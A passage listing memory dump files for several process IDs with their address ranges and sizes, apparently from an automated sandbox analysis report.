                                                          • memory/1616-299-0x00007FF803D30000-0x00007FF803DFE000-memory.dmp

                                                            Filesize

                                                            824KB

                                                          • memory/1616-300-0x00007FF8037F0000-0x00007FF803D23000-memory.dmp

                                                            Filesize

                                                            5.2MB

                                                          • memory/1616-315-0x00007FF813560000-0x00007FF813613000-memory.dmp

                                                            Filesize

                                                            716KB

                                                          • memory/1616-327-0x00007FF813340000-0x00007FF81334D000-memory.dmp

                                                            Filesize

                                                            52KB

                                                          • memory/1616-326-0x00007FF803D30000-0x00007FF803DFE000-memory.dmp

                                                            Filesize

                                                            824KB

                                                          • memory/1616-325-0x00007FF813370000-0x00007FF8133A3000-memory.dmp

                                                            Filesize

                                                            204KB

                                                          • memory/1616-324-0x00007FF8133B0000-0x00007FF8133BD000-memory.dmp

                                                            Filesize

                                                            52KB

                                                          • memory/1616-323-0x00007FF8134C0000-0x00007FF8134D9000-memory.dmp

                                                            Filesize

                                                            100KB

                                                          • memory/1616-322-0x00007FF803E00000-0x00007FF803F7F000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/1616-321-0x00007FF8133C0000-0x00007FF8133E5000-memory.dmp

                                                            Filesize

                                                            148KB

                                                          • memory/1616-320-0x00007FF813B10000-0x00007FF813B3B000-memory.dmp

                                                            Filesize

                                                            172KB

                                                          • memory/1616-319-0x00007FF8183D0000-0x00007FF8183E9000-memory.dmp

                                                            Filesize

                                                            100KB

                                                          • memory/1616-318-0x00007FF813B40000-0x00007FF813B67000-memory.dmp

                                                            Filesize

                                                            156KB

                                                          • memory/1616-317-0x00007FF81BAC0000-0x00007FF81BACF000-memory.dmp

                                                            Filesize

                                                            60KB

                                                          • memory/1616-316-0x00007FF8037F0000-0x00007FF803D23000-memory.dmp

                                                            Filesize

                                                            5.2MB

                                                          • memory/4016-81-0x00000214E3DE0000-0x00000214E3E02000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/5200-191-0x0000023FBE150000-0x0000023FBE158000-memory.dmp

                                                            Filesize

                                                            32KB